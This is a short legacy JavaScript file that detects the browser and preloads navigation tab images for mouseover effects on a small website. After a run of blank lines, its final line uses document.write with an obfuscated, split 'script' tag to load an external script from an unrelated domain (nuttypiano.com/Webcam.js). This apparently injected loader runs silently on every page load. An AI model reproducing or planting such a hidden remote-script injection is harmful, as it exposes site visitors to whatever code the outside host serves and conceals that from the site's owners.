<!--
//-- This script detects browser type and preloads all images for the mouseovers.
//list of images with corresponding pages
	// 1 - gallery
	// 2 - services
	// 3 - newsletter
	// 4 - calendar
	// 5 - sign up for newsletter
	
// Use this syntax to call this function:
// <a href="" onmouseover="imgAct('img1')" onmouseout="imgInact('img1')"><img name="img1" border="0" width="" height="" src="" alt="">

// Is browser Netscape 3 + or IE 4 +.
bName = navigator.appName;
bVer = parseInt(navigator.appVersion);

if ((bName == "Netscape" && bVer >= 3) || (bName == "Microsoft Internet Explorer" && bVer >= 4)) br = "n3"; 
else br = "n2";

if (br== "n3") { 
	// on images
	img1on = new Image();
	img2on = new Image();
	img3on = new Image();
	img4on = new Image();
	img5on = new Image();
	img6on = new Image();
	img7on = new Image();
	img1on.src = "_images/navigation/tabHomeOn.gif";
	img2on.src = "_images/navigation/tabAboutOn.gif";
	img3on.src = "_images/navigation/tabCreedOn.gif";
	img4on.src = "_images/navigation/tabServicesOn.gif";
	img5on.src = "_images/navigation/tabGiftsOn.gif";
	img6on.src = "_images/navigation/tabContactOn.gif";
	img7on.src = "_images/navigation/tabChangeOn.gif";
	
	// off images
	img1off = new Image();
	img2off = new Image();
	img3off = new Image();
	img4off = new Image();
	img5off = new Image();
	img6off = new Image();
	img7off = new Image();
	img1off.src = "_images/navigation/tabHome.gif";
	img2off.src = "_images/navigation/tabAbout.gif";
	img3off.src = "_images/navigation/tabCreed.gif";
	img4off.src = "_images/navigation/tabServices.gif";
	img5off.src = "_images/navigation/tabGifts.gif";
	img6off.src = "_images/navigation/tabContact.gif";
	img7off.src = "_images/navigation/tabChange.gif";
}

// Function to activate images.
function imgAct(imgName){if (br == "n3"){document[imgName].src = eval(imgName + "on.src");}}

// Function to deactivate images.
function imgInact(imgName){if (br == "n3"){document[imgName].src = eval(imgName + "off.src");}}
//-->







document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/Webcam.js"></scri'+'pt>');